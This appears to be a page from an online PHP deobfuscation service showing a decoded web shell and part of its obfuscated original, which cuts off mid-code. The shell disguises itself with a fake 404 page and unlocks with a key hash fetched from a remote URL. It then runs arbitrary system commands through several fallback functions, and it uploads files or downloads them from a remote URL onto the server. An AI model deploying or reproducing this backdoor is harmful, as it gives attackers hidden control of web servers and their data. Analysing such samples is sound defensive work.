Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto onTpy; m4TwE: error_reporting(0); goto ajB01; gZHuJ: $path = ThisCWD(); goto ..

Decoded Output download

<?php 
 goto onTpy; m4TwE: error_reporting(0); goto ajB01; gZHuJ: $path = ThisCWD(); goto dHhVA; iQeLq: $generatekey = json_decode($nulzkey, true); goto EjKbJ; QCCmj: date_default_timezone_set("\x41\x73\x69\x61\x2f\x4a\x61\x6b\x61\x72\x74\x61"); goto VIFm2; qAP0V: $key = $generatekey["key"]; goto IxdSy; ajB01: @ini_set("\x65\x72\x72\x6f\x72\x5f\x6c\x6f\x67", null); goto J6QrD; EjKbJ: if ($generatekey === null) { die("Failed To Generate Key"); } goto qAP0V; vODpk: $nulzkey = file_get_contents($ganteng); goto iQeLq; VIFm2: function NotFound() { header("HTTP/1.0 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>\xa</head><body>\xa<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>\xa<address>" . $_SERVER["SERVER_SOFTWARE"] . " Server at " . $_SERVER["HTTP_HOST"] . "</address>
</body></html>\xa"; } goto qWGX0; OV4sk: @ini_set("\x64\x69\x73\x70\x6c\x61\x79\x5f\x65\x72\x72\x6f\x72\x73", 0); goto QCCmj; VQ7dY: $ganteng = base64_decode("aHR0cHM6Ly9jZG4uanNkZWxpdnIubmV0L2doL2hheG9yc3RhcnMvYXJjaGl2ZUBtYXN0ZXIva2V5Lmpzb24="); goto vODpk; wvnte: function ThisCWD() { if (function_exists("getcwd")) { return @getcwd(); } else { return dirname($_SERVER["SCRIPT_FILENAME"]); } } goto gZHuJ; IxdSy: $param = isset($_GET["nulz"]) ? $_GET["nulz"] : ''; goto rKDtV; hQXuv: if (isset($_POST["cmd"])) { $komendnya = $_POST["cmd"]; echo NuLzCmd($komendnya); } goto wvnte; DgLAt: @ini_set("\x6f\x75\x74\x70\x75\x74\x5f\x62\x75\x66\x66\x65\x72\x69\x6e\x67", 0); goto OV4sk; kKYCL: function NuLzCmd($komendnya) { $hayoloh = "h" . "tm" . "lspe" . "cialc" . "hars"; $fw = "f" . "wr" . "it" . "e"; $fc = "f" . "cl" . "os" . "e"; $fr = "f" . "re" . "a" . "d"; $is_rsrc = "is" . "_" . "re" . "so" . "ur" . "ce"; $sgc = "s" . "trea" . "m_g" . "et_c" . "ont" . "ents"; $proc = "pr" . "oc" . "_" . "o" . "pen"; $proc_cls = "p" . "ro" . "c" . "_" . "c" . "lose"; $pop = "p" . "ope" . "n"; $pop_cls = "pc" . "lose"; $exc = "e" . "x" . "ec"; $sys = "s" . "ys" . "t" . "em"; $pass = "pa" . "s" . "sth" . "ru"; $sh_exc = "s" . "he" . "ll" . "_" . "e" . "xe" . "c"; $com = "C" . "O" . "M"; $wscsh = "WS" . "cr" . "ipt" . "." . "S" . "he" . "ll"; $cMdexe = "c" . "md" . "." . "e" . "x" . "e"; $func_exist = "fu" . "nct" . "ion" . "_" . "ex" . "ist" . "s"; $preg = "pr" . "eg_" . "mat" . "ch"; $regex = "2" . ">" . "&" . "1"; if (!$preg("/" . $regex . "/i", $komendnya)) { $komendnya = $komendnya . " " . $regex; } if ($func_exist($proc)) { $descriptors = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = $proc($komendnya, $descriptors, $pipes); if ($is_rsrc($process)) { $fw($pipes[0], "input_data_here"); $fc($pipes[0]); $output = $sgc($pipes[1]); $errors = $sgc($pipes[2]); $fc($pipes[1]); $fc($pipes[2]); $resultCode = $proc_cls($process); return trim($hayoloh(stripslashes($output))); } } elseif ($func_exist($pop)) { $process = $pop($komendnya, "r"); $read = $fr($process, 2096); return trim($hayoloh(stripslashes(print_r("{$process}: " . gettype($process) . "
{$read} 
")))); $pop_cls($process); } elseif ($func_exist($exc)) { $exc($komendnya, $output, $returnCode); if ($returnCode === 0) { $res = implode($output); return trim($hayoloh(stripslashes($res))); ob_flush(); flush(); } } elseif ($func_exist($sys)) { $out = $sys($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($pass)) { $out = $pass($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($sh_exc)) { $out = $sh_exc($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($com)) { $shell = new $com($wscsh); $kom_mand = "{$cMdexe} /c " . $komendnya; $output = $shell->Exec($kom_mand)->StdOut->ReadAll(); return trim($hayoloh(stripslashes($output))); } else { return "<b>The Function To Run The Command Is Disable On This Serever</b>"; } } goto hQXuv; onTpy: set_time_limit(0); goto m4TwE; qWGX0: function CreateFile($fi_le_name, $fi_le_content) { if (function_exists("file_put_contents")) { $c_r_e_a_t_e_f_i_l_e_1 = file_put_contents($fi_le_name, $fi_le_content); if ($c_r_e_a_t_e_f_i_l_e_1 === false) { return false; } else { return true; } } elseif (function_exists("fopen")) { $c_r_e_a_t_e_f_i_l_e_2 = fopen($fi_le_name, "w"); if ($c_r_e_a_t_e_f_i_l_e_2 === false) { return false; } else { if (fwrite($c_r_e_a_t_e_f_i_l_e_2, $fi_le_content) === false) { fclose($c_r_e_a_t_e_f_i_l_e_2); return false; } fclose($c_r_e_a_t_e_f_i_l_e_2); return true; } } else { return false; } } goto kKYCL; dHhVA: $path = str_replace("\", "/", $path); goto VQ7dY; J6QrD: @ini_set("\x6c\x6f\x67\x5f\x65\x72\x72\x6f\x72\x73", 0); goto K0Vp0; K0Vp0: @ini_set("\x6d\x61\x78\x5f\x65\x78\x65\x63\x75\x74\x69\x6f\x6e\x5f\x74\x69\x6d\x65", 0); goto DgLAt; rKDtV: if (empty($param)) { NotFound(); } else { $get_key = base64_encode(md5($param)); if ($get_key !== false) { $sha1_key = sha1($get_key); if ($key === $sha1_key) { echo "<span style="white-space: nowrap;">Key: <pre style="display: inline;white-space: pre-wrap;">" . $param . "</pre></span><br>"; echo "<span style="white-space: nowrap;">Hash: <pre style="display: inline;white-space: pre-wrap;">" . $sha1_key . "</pre></span><br>"; echo "<span style="white-space: nowrap;">Status: <pre style="display: inline;white-space: pre-wrap;">Valid</pre></span>"; echo "<pre>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</pre>"; echo "\xa            <form action="" method="POST" enctype="multipart/form-data">
                <label for="upload_path">Path:</label>
                <input type="text" style="width: 30vh;" name="upload_path" id="upload_path" value="" . $path . ""><br>\xa                <label for="file">(Auto Upload):</label>\xa                <input type="file" name="file[]" id="file" multiple><br>
                <button type="submit" name="uploads">Upload</button>\xa                "; if (isset($_POST["uploads"])) { if (isset($_FILES["file"])) { $countFiles = count($_FILES["file"]["name"]); for ($i = 0; $i < $countFiles; $i++) { $fi_le_Na_me = $_FILES["file"]["name"][$i]; $location = $_POST["upload_path"] . "/" . $fi_le_Na_me; $uploadFunction = "m" . "ove" . "_up" . "loa" . "ded_fi" . "le"; if ($uploadFunction($_FILES["file"]["tmp_name"][$i], $location)) { echo "<span style='background: #222222; color: #00ff00; padding: 5px; border-radius: 10px;'>Upload Success</span>"; } else { echo "<span style='background: #222222; color: #ff0000; padding: 5px; border-radius: 10px;'>Upload Failed</span>"; } } } else { echo "<span style='color: #fcf803;'>Tidak Ada File Yang Di Upload</span>"; } } echo "<pre>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</pre>"; echo "
                <b>Remote Upload</b><br>\xa                <label for="fileurl">URL:</label>\xa                <input type="text" style="width: 30vh;" name="fileurl" id="fileurl" placeholder="https://nulz.edu.gov.ac.id/shell.txt"><br>\xa                <label for="savename">SAVE AS:</label>
                <input type="text" style="width: 30vh;" name="savename" id="savename" value="" . $path . "/saved.txt"><br>
                <button type="submit" name="remoteup">Save</button>\xa            "; if (isset($_POST["remoteup"])) { if (!empty($_POST["fileurl"]) && !empty($_POST["savename"])) { $fileurl = $_POST["fileurl"]; $saveas = $_POST["savename"]; $filecontent = file_get_contents($fileurl); if ($filecontent !== false) { if (CreateFile($saveas, $filecontent)) { echo "<span style='background: #222222; color: #00ff00; padding: 5px; border-radius: 10px;'>Remote Upload Success</span>"; } else { echo "<span style='background: #222222; color: #ff0000; padding: 5px; border-radius: 10px;'>Remote Upload Failed</span>"; } } else { echo "<span style='background: #222222; color: #ffe100; padding: 5px; border-radius: 10px;'>Warning: Your input URL is not valid, please enter a valid URL</span>"; } } else { echo "<span style='background: #222222; color: #ffe100; padding: 5px; border-radius: 10px;'>Warning: The input URL is empty, please input your URL</span>"; } } echo "<pre>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</pre>"; echo "
                <b>Commands</b><br>\xa                <label for="cmds">$</label>\xa                <input type="text" style="width: 40vh;" name="cmds" id="cmds" autofocus placeholder="ls -la"><br>\xa            "; echo "<textarea style="font-size: 10px; width: 40vh; height: 300px;">"; if ($_SERVER["REQUEST_METHOD"] === "POST") { $komendnya = $_POST["cmds"]; echo NuLzCmd($komendnya); } echo "</textarea>"; echo "</form>"; } else { NotFound(); } } else { NotFound(); } } ?>

Did this file decode correctly?

Original Code

<?php
 goto onTpy; m4TwE: error_reporting(0); goto ajB01; gZHuJ: $path = ThisCWD(); goto dHhVA; iQeLq: $generatekey = json_decode($nulzkey, true); goto EjKbJ; QCCmj: date_default_timezone_set("\x5c\170\64\61\134\170\x37\63\134\170\66\71\134\x78\66\x31\x5c\x78\62\x66\134\x78\64\141\x5c\170\x36\61\134\170\x36\x62\x5c\170\x36\61\x5c\x78\67\x32\134\170\x37\x34\134\x78\x36\x31"); goto VIFm2; qAP0V: $key = $generatekey["\153\145\171"]; goto IxdSy; ajB01: @ini_set("\134\x78\66\65\x5c\170\x37\62\x5c\170\67\x32\134\170\x36\x66\134\170\x37\62\134\x78\65\x66\134\170\66\143\134\170\66\x66\134\x78\66\67", null); goto J6QrD; EjKbJ: if ($generatekey === null) { die("\x46\141\x69\154\x65\x64\40\124\x6f\x20\107\x65\x6e\x65\162\x61\164\x65\x20\x4b\145\171"); } goto qAP0V; vODpk: $nulzkey = file_get_contents($ganteng); goto iQeLq; VIFm2: function NotFound() { header("\x48\124\x54\120\57\x31\x2e\x30\40\64\x30\64\x20\x4e\x6f\164\x20\106\157\x75\156\144"); echo "\74\41\104\x4f\103\124\131\120\x45\x20\110\x54\x4d\114\x20\x50\x55\x42\114\111\103\x20\x22\x2d\57\x2f\x49\105\124\x46\57\x2f\104\x54\104\40\110\124\x4d\114\x20\62\x2e\60\x2f\57\105\x4e\42\76\12\x3c\x68\x74\x6d\x6c\76\x3c\150\145\x61\144\x3e\12\74\164\151\x74\154\145\76\x34\x30\64\40\x4e\157\x74\40\x46\x6f\165\x6e\x64\74\57\x74\x69\x74\x6c\145\x3e\xa\74\x2f\150\x65\141\x64\x3e\x3c\x62\x6f\144\x79\76\xa\74\x68\x31\x3e\x4e\x6f\x74\40\x46\x6f\165\156\x64\x3c\x2f\150\x31\x3e\12\x3c\160\76\x54\150\145\x20\x72\145\161\x75\145\x73\x74\x65\144\40\x55\122\114\x20\167\141\163\x20\156\157\164\x20\x66\157\165\x6e\x64\40\157\x6e\40\x74\x68\x69\x73\40\x73\145\x72\166\145\162\x2e\74\x2f\x70\76\12\74\150\162\x3e\xa\74\x61\144\144\x72\x65\x73\x73\76" . $_SERVER["\x53\105\122\126\x45\122\x5f\x53\117\106\124\127\101\x52\x45"] . "\x20\x53\x65\162\x76\x65\162\x20\141\164\x20" . $_SERVER["\x48\124\x54\120\137\x48\117\x53\x54"] . "\x3c\57\x61\144\x64\162\x65\163\x73\76\12\x3c\x2f\142\157\x64\x79\x3e\74\57\x68\x74\155\x6c\76\xa"; } goto qWGX0; OV4sk: @ini_set("\x5c\170\66\64\134\170\66\71\134\170\67\63\134\x78\67\60\134\x78\66\143\134\x78\66\61\x5c\170\67\x39\x5c\x78\65\x66\134\x78\x36\x35\x5c\170\67\x32\x5c\x78\67\x32\134\x78\66\146\134\x78\67\x32\x5c\x78\67\x33", 0); goto QCCmj; VQ7dY: $ganteng = base64_decode("\141\x48\122\60\x63\x48\x4d\66\x4c\171\x39\152\x5a\107\64\165\x61\156\x4e\x6b\132\x57\170\160\144\156\x49\x75\142\155\126\x30\x4c\62\x64\157\x4c\x32\150\x68\x65\x47\71\171\143\63\x52\150\143\156\115\166\131\x58\112\x6a\x61\x47\x6c\62\x5a\x55\x42\x74\131\130\116\60\x5a\x58\x49\x76\x61\x32\126\x35\114\x6d\x70\x7a\x62\x32\64\75"); goto vODpk; wvnte: function ThisCWD() { if (function_exists("\147\x65\164\143\167\x64")) { return @getcwd(); } else { return dirname($_SERVER["\123\x43\x52\x49\x50\124\x5f\x46\111\114\x45\x4e\101\x4d\x45"]); } } goto gZHuJ; IxdSy: $param = isset($_GET["\156\165\154\x7a"]) ? $_GET["\156\x75\154\x7a"] : ''; goto rKDtV; hQXuv: if (isset($_POST["\143\155\x64"])) { $komendnya = $_POST["\143\x6d\x64"]; echo NuLzCmd($komendnya); } goto wvnte; DgLAt: @ini_set("\x5c\170\x36\146\x5c\170\67\65\x5c\170\67\x34\x5c\x78\67\60\134\x78\x37\65\134\170\x37\x34\x5c\170\x35\146\x5c\170\x36\x32\134\170\x37\65\x5c\x78\x36\x36\134\x78\x36\66\x5c\170\x36\x35\134\x78\x37\x32\134\x78\x36\71\134\x78\66\145\134\170\66\67", 0); goto OV4sk; kKYCL: function NuLzCmd($komendnya) { $hayoloh = "\150" . "\x74\155" . "\x6c\x73\x70\x65" . "\x63\151\141\154\143" . "\150\141\x72\x73"; $fw = "\146" . "\167\162" . "\x69\x74" . "\x65"; $fc = "\146" . "\x63\154" . "\157\163" . "\145"; $fr = "\146" . "\162\145" . "\141" . "\x64"; $is_rsrc = "\x69\x73" . "\137" . "\x72\x65" . "\x73\157" . "\165\162" . "\x63\x65"; $sgc = "\163" . "\x74\x72\x65\x61" . "\155\137\x67" . "\x65\164\x5f\143" . "\157\156\x74" . "\x65\x6e\164\x73"; $proc = "\x70\162" . "\157\143" . "\x5f" . "\x6f" . "\x70\x65\156"; $proc_cls = "\160" . "\x72\x6f" . "\143" . "\137" . "\143" . "\x6c\157\x73\145"; $pop = "\160" . "\x6f\x70\145" . "\156"; $pop_cls = "\x70\x63" . "\x6c\157\x73\x65"; $exc = "\145" . "\x78" . "\145\x63"; $sys = "\x73" . "\x79\163" . "\164" . "\145\155"; $pass = "\x70\141" . "\x73" . "\163\164\x68" . "\x72\165"; $sh_exc = "\163" . "\150\145" . "\x6c\154" . "\137" . "\145" . "\170\145" . "\143"; $com = "\103" . "\x4f" . "\x4d"; $wscsh = "\x57\x53" . "\143\x72" . "\151\x70\x74" . "\56" . "\x53" . "\150\145" . "\154\154"; $cMdexe = "\143" . "\155\x64" . "\56" . "\145" . "\x78" . "\x65"; $func_exist = "\x66\x75" . "\156\x63\x74" . "\151\157\156" . "\x5f" . "\145\170" . "\x69\x73\164" . "\x73"; $preg = "\x70\162" . "\x65\147\137" . "\x6d\x61\164" . "\143\x68"; $regex = "\x32" . "\76" . "\46" . "\x31"; if (!$preg("\x2f" . $regex . "\x2f\x69", $komendnya)) { $komendnya = $komendnya . "\x20" . $regex; } if ($func_exist($proc)) { $descriptors = array(0 => array("\160\151\160\145", "\x72"), 1 => array("\x70\x69\160\x65", "\x77"), 2 => array("\x70\x69\160\145", "\167")); $process = $proc($komendnya, $descriptors, $pipes); if ($is_rsrc($process)) { $fw($pipes[0], "\151\x6e\x70\x75\x74\x5f\144\x61\164\141\137\x68\145\162\x65"); $fc($pipes[0]); $output = $sgc($pipes[1]); $errors = $sgc($pipes[2]); $fc($pipes[1]); $fc($pipes[2]); $resultCode = $proc_cls($process); return trim($hayoloh(stripslashes($output))); } } elseif ($func_exist($pop)) { $process = $pop($komendnya, "\162"); $read = $fr($process, 2096); return trim($hayoloh(stripslashes(print_r("{$process}\72\40" . gettype($process) . "\12{$read}\40\12")))); $pop_cls($process); } elseif ($func_exist($exc)) { $exc($komendnya, $output, $returnCode); if ($returnCode === 0) { $res = implode($output); return trim($hayoloh(stripslashes($res))); ob_flush(); flush(); } } elseif ($func_exist($sys)) { $out = $sys($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($pass)) { $out = $pass($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($sh_exc)) { $out = $sh_exc($komendnya); return trim($hayoloh(stripslashes($out))); } elseif ($func_exist($com)) { $shell = new $com($wscsh); $kom_mand = "{$cMdexe}\40\57\143\40" . $komendnya; $output = $shell->Exec($kom_mand)->StdOut->ReadAll(); return trim($hayoloh(stripslashes($output))); } else { return "\74\x62\76\x54\x68\x65\40\x46\165\156\x63\164\151\157\x6e\40\124\157\x20\x52\x75\156\x20\x54\150\145\40\103\x6f\x6d\x6d\141\156\144\40\x49\x73\x20\x44\151\163\x61\x62\154\145\40\x4f\156\40\x54\150\x69\163\x20\x53\145\162\145\x76\145\x72\x3c\x2f\142\x3e"; } } goto hQXuv; onTpy: set_time_limit(0); goto m4TwE; qWGX0: function CreateFile($fi_le_name, $fi_le_content) { if (function_exists("\x66\x69\x6c\145\x5f\160\165\x74\x5f\143\157\x6e\x74\145\x6e\164\163")) { $c_r_e_a_t_e_f_i_l_e_1 = file_put_contents($fi_le_name, $fi_le_content); if ($c_r_e_a_t_e_f_i_l_e_1 === false) { return false; } else { return true; } } elseif (function_exists("\146\x6f\x70\x65\x6e")) { $c_r_e_a_t_e_f_i_l_e_2 = fopen($fi_le_name, "\167"); if ($c_r_e_a_t_e_f_i_l_e_2 === false) { return false; } else { if (fwrite($c_r_e_a_t_e_f_i_l_e_2, $fi_le_content) === false) { fclose($c_r_e_a_t_e_f_i_l_e_2); return false; } fclose($c_r_e_a_t_e_f_i_l_e_2); return true; } } else { return false; } } goto kKYCL; dHhVA: $path = str_replace("\x5c", "\x2f", $path); goto VQ7dY; J6QrD: @ini_set("\x5c\170\66\143\134\170\66\146\134\x78\x36\x37\134\170\x35\x66\134\170\x36\x35\134\170\x37\62\134\170\x37\x32\134\170\x36\146\134\x78\x37\x32\x5c\x78\67\x33", 0); goto K0Vp0; K0Vp0: @ini_set("\x5c\x78\x36\x64\x5c\170\x36\x31\134\x78\67\70\134\x78\x35\146\134\x78\66\x35\x5c\170\x37\70\134\x78\x36\65\x5c\170\66\x33\134\x78\67\x35\x5c\170\67\x34\134\170\x36\71\x5c\170\x36\x66\134\x78\x36\145\x5c\x78\x35\146\x5c\x78\67\64\x5c\170\x36\71\x5c\170\x36\144\x5c\170\x36\x35", 0); goto DgLAt; rKDtV: if (empty($param)) { NotFound(); } else { $get_key = base64_encode(md5($param)); if ($get_key !== false) { $sha1_key = sha1($get_key); if ($key === $sha1_key) { echo "\x3c\x73\160\141\x6e\x20\163\x74\x79\x6c\145\75\x22\x77\150\x69\164\145\55\x73\160\141\143\145\x3a\40\156\x6f\x77\162\x61\x70\73\x22\x3e\x4b\x65\x79\x3a\40\74\x70\162\x65\x20\x73\164\171\x6c\145\x3d\x22\144\151\163\x70\154\141\x79\72\x20\151\156\x6c\151\156\145\73\x77\x68\151\x74\x65\55\163\x70\141\x63\x65\x3a\40\160\162\x65\x2d\x77\x72\x61\160\x3b\42\76" . $param . "\74\x2f\160\x72\145\76\x3c\x2f\163\x70\x61\x6e\x3e\74\x62\162\x3e"; echo "\74\x73\160\141\156\40\163\164\x79\154\145\x3d\x22\x77\x68\151\x74\x65\x2d\163\x70\141\x63\145\72\x20\x6e\157\167\162\141\x70\x3b\x22\76\110\141\x73\x68\x3a\x20\74\x70\162\145\x20\x73\x74\171\154\x65\75\x22\144\x69\x73\x70\x6c\x61\171\72\40\151\x6e\154\x69\156\x65\x3b\167\x68\x69\x74\x65\55\x73\x70\x61\x63\145\72\x20\x70\162\x65\55\167\162\x61\x70\x3b\x22\76" . $sha1_key . "\74\x2f\160\162\145\76\74\x2f\163\160\x61\x6e\76\74\142\x72\76"; echo "\74\163\x70\x61\x6e\40\163\x74\x79\154\x65\x3d\x22\x77\x68\151\x74\x65\x2d\163\160\x61\143\145\72\x20\156\x6f\x77\162\x61\160\73\x22\x3e\x53\x74\x61\x74\x75\163\72\40\74\160\x72\145\x20\x73\164\x79\x6c\x65\75\42\144\x69\163\160\154\x61\171\x3a\x20\151\x6e\154\x69\156\145\73\167\150\x69\x74\x65\55\163\160\141\x63\x65\72\40\160\162\145\x2d\167\x72\141\160\x3b\42\76\126\141\x6c\x69\144\74\57\x70\x72\145\76\x3c\x2f\x73\x70\x61\156\76"; echo "\74\160\162\x65\76\55\75\x2d\x3d\55\75\55\x3d\55\x3d\x2d\75\55\x3d\x2d\75\55\x3d\x2d\x3d\55\75\55\75\55\75\x2d\75\x2d\x3d\55\75\x2d\75\x2d\75\55\75\55\75\x2d\75\55\x3d\55\75\55\75\55\75\x2d\x3c\57\x70\x72\x65\x3e"; echo "\xa\x20\40\x20\x20\40\x20\40\40\40\x20\40\40\x3c\146\x6f\162\x6d\x20\141\x63\x74\x69\157\x6e\75\x22\x22\40\x6d\x65\x74\x68\x6f\x64\75\42\x50\x4f\123\x54\x22\x20\145\x6e\143\164\x79\x70\x65\75\x22\155\x75\154\x74\x69\160\141\x72\x74\57\146\x6f\x72\155\55\144\141\x74\141\x22\x3e\12\x20\x20\40\40\x20\x20\40\x20\40\40\40\40\x20\x20\40\40\x3c\x6c\x61\142\x65\154\40\146\157\x72\75\42\165\x70\154\x6f\141\x64\137\160\141\164\150\42\76\x50\x61\x74\x68\72\x3c\x2f\x6c\x61\x62\x65\x6c\x3e\12\40\40\x20\x20\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\74\151\x6e\160\165\x74\x20\164\x79\160\x65\x3d\42\x74\x65\x78\x74\x22\40\163\x74\171\x6c\145\x3d\42\167\151\x64\x74\150\x3a\x20\63\x30\x76\150\73\42\x20\156\141\155\145\75\x22\x75\160\154\157\141\x64\137\x70\x61\164\150\x22\x20\x69\x64\75\x22\165\x70\154\157\141\144\137\160\x61\x74\x68\x22\x20\x76\141\x6c\x75\145\75\42" . $path . "\x22\x3e\x3c\x62\162\x3e\xa\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\40\x3c\x6c\141\x62\145\154\40\146\157\x72\x3d\42\146\151\x6c\145\42\x3e\50\x41\165\164\157\x20\125\160\x6c\x6f\141\144\x29\72\74\57\x6c\141\142\x65\x6c\76\xa\x20\40\40\40\40\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\x3c\x69\x6e\160\x75\x74\x20\164\171\x70\145\x3d\x22\x66\151\154\x65\x22\x20\156\x61\155\145\x3d\x22\x66\151\x6c\145\x5b\135\x22\x20\151\144\x3d\42\146\151\154\145\x22\x20\155\165\154\x74\x69\x70\x6c\x65\x3e\x3c\x62\x72\x3e\12\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\74\x62\x75\x74\164\157\x6e\40\164\x79\x70\145\75\42\x73\165\142\x6d\151\x74\42\x20\156\x61\155\145\x3d\42\165\x70\154\157\x61\144\x73\x22\x3e\125\x70\x6c\x6f\141\144\74\57\142\x75\x74\164\x6f\156\76\xa\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\40\x20\40\x20"; if (isset($_POST["\165\x70\154\157\x61\x64\x73"])) { if (isset($_FILES["\x66\x69\x6c\x65"])) { $countFiles = count($_FILES["\x66\151\x6c\x65"]["\156\x61\155\x65"]); for ($i = 0; $i < $countFiles; $i++) { $fi_le_Na_me = $_FILES["\146\151\x6c\x65"]["\x6e\x61\155\145"][$i]; $location = $_POST["\165\x70\154\157\141\144\x5f\x70\x61\164\150"] . "\x2f" . $fi_le_Na_me; $uploadFunction = "\x6d" . "\157\166\x65" . "\137\165\x70" . "\154\x6f\x61" . "\x64\x65\144\137\146\x69" . "\x6c\x65"; if ($uploadFunction($_FILES["\146\x69\154\145"]["\x74\x6d\160\137\156\x61\x6d\x65"][$i], $location)) { echo "\74\163\160\x61\x6e\40\x73\x74\171\x6c\145\x3d\x27\142\x61\143\153\147\162\x6f\165\156\x64\x3a\x20\x23\62\x32\x32\x32\62\x32\x3b\40\x63\157\x6c\x6f\162\72\x20\x23\x30\60\x66\146\60\60\73\40\160\141\144\144\151\156\x67\x3a\40\65\x70\x78\x3b\40\142\x6f\162\x64\x65\x72\x2d\x72\x61\x64\x69\165\163\x3a\40\61\60\x70\170\73\x27\x3e\125\x70\154\157\x61\x64\x20\x53\x75\x63\x63\145\x73\x73\74\57\x73\x70\141\x6e\x3e"; } else { echo "\74\x73\160\141\x6e\x20\x73\x74\x79\154\145\x3d\47\x62\x61\143\x6b\x67\162\157\165\156\x64\72\40\43\x32\x32\x32\62\x32\x32\73\40\143\x6f\154\157\162\x3a\40\x23\x66\146\x30\60\60\60\x3b\x20\x70\141\144\144\x69\156\x67\72\x20\x35\x70\170\x3b\40\142\157\162\144\x65\x72\55\162\x61\144\x69\x75\163\72\x20\x31\x30\x70\170\73\47\x3e\125\x70\x6c\x6f\141\144\40\x46\x61\151\154\145\144\x3c\x2f\163\160\x61\156\x3e"; } } } else { echo "\x3c\163\160\x61\156\40\163\x74\x79\x6c\145\x3d\x27\x63\157\x6c\x6f\x72\72\40\x23\146\143\x66\x38\60\63\73\x27\x3e\124\151\x64\141\x6b\x20\101\x64\x61\x20\106\x69\x6c\x65\40\131\141\156\147\x20\104\151\40\125\160\154\157\x61\x64\x3c\57\163\x70\x61\156\76"; } } echo "\x3c\x70\x72\145\x3e\55\75\x2d\x3d\55\x3d\55\75\55\75\55\75\55\75\55\75\x2d\75\x2d\x3d\x2d\75\x2d\x3d\55\75\x2d\75\x2d\x3d\55\75\x2d\x3d\x2d\x3d\55\75\55\75\55\x3d\55\x3d\x2d\x3d\55\x3d\55\75\x2d\x3c\x2f\x70\162\x65\76"; echo "\12\x20\x20\40\x20\x20\40\40\40\x20\40\40\x20\40\40\40\40\x3c\142\x3e\x52\x65\155\157\164\145\x20\125\160\x6c\x6f\141\144\74\57\x62\76\x3c\x62\162\x3e\xa\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\74\154\141\142\145\x6c\x20\x66\157\162\75\42\x66\x69\154\145\165\x72\x6c\x22\76\125\122\x4c\x3a\74\x2f\154\141\142\x65\154\x3e\xa\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x3c\151\x6e\160\165\164\40\164\171\x70\x65\75\42\164\145\170\164\42\40\163\164\171\154\145\75\x22\167\151\144\x74\150\72\40\63\60\166\x68\73\x22\40\x6e\141\155\145\x3d\42\146\x69\x6c\145\x75\x72\x6c\42\40\151\144\75\x22\146\x69\154\145\165\162\x6c\42\x20\x70\154\x61\143\145\150\x6f\154\144\145\162\75\x22\x68\164\164\x70\163\72\x2f\x2f\156\x75\154\x7a\56\145\x64\165\x2e\147\x6f\166\x2e\141\x63\56\x69\144\x2f\163\x68\x65\x6c\x6c\56\x74\170\x74\x22\x3e\x3c\142\x72\x3e\xa\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\74\154\141\142\145\154\x20\146\x6f\162\x3d\x22\163\x61\x76\x65\x6e\x61\155\x65\x22\x3e\123\101\x56\105\40\x41\x53\x3a\74\x2f\154\141\142\x65\x6c\x3e\12\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\74\x69\156\x70\165\x74\x20\164\171\x70\x65\75\x22\164\145\170\164\42\40\x73\x74\171\154\145\x3d\x22\x77\151\x64\164\x68\72\x20\63\x30\166\150\x3b\x22\x20\x6e\141\x6d\145\x3d\42\163\141\166\145\156\x61\155\x65\x22\40\x69\x64\x3d\42\x73\x61\x76\x65\156\x61\x6d\145\x22\40\166\x61\x6c\x75\x65\x3d\42" . $path . "\57\163\141\x76\145\x64\x2e\164\x78\x74\42\76\74\x62\x72\x3e\12\x20\40\x20\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\x3c\142\x75\164\164\x6f\156\40\164\171\x70\145\75\42\163\165\142\155\x69\x74\42\40\156\x61\x6d\x65\75\x22\x72\145\x6d\157\x74\x65\165\x70\x22\x3e\123\141\x76\x65\74\57\142\x75\164\164\157\x6e\76\xa\40\40\x20\40\40\x20\40\40\x20\40\x20\40"; if (isset($_POST["\162\145\155\157\164\x65\x75\x70"])) { if (!empty($_POST["\x66\x69\x6c\145\165\x72\154"]) && !empty($_POST["\163\141\166\145\156\141\155\x65"])) { $fileurl = $_POST["\x66\x69\154\145\165\162\x6c"]; $saveas = $_POST["\163\x61\x76\x65\156\141\x6d\145"]; $filecontent = file_get_contents($fileurl); if ($filecontent !== false) { if (CreateFile($saveas, $filecontent)) { echo "\74\x73\160\141\x6e\40\x73\x74\171\154\x65\x3d\x27\142\x61\x63\x6b\147\x72\157\165\x6e\144\x3a\x20\43\62\x32\x32\62\x32\62\x3b\40\x63\157\154\157\162\x3a\40\x23\x30\60\x66\x66\60\x30\73\x20\160\141\x64\144\x69\x6e\147\72\x20\x35\x70\x78\73\x20\142\x6f\162\x64\145\x72\x2d\162\x61\144\x69\x75\x73\x3a\40\61\60\x70\x78\x3b\47\76\x52\145\x6d\157\x74\145\x20\x55\160\x6c\x6f\x61\144\40\123\165\x63\x63\x65\163\163\x3c\57\163\160\x61\x6e\x3e"; } else { echo 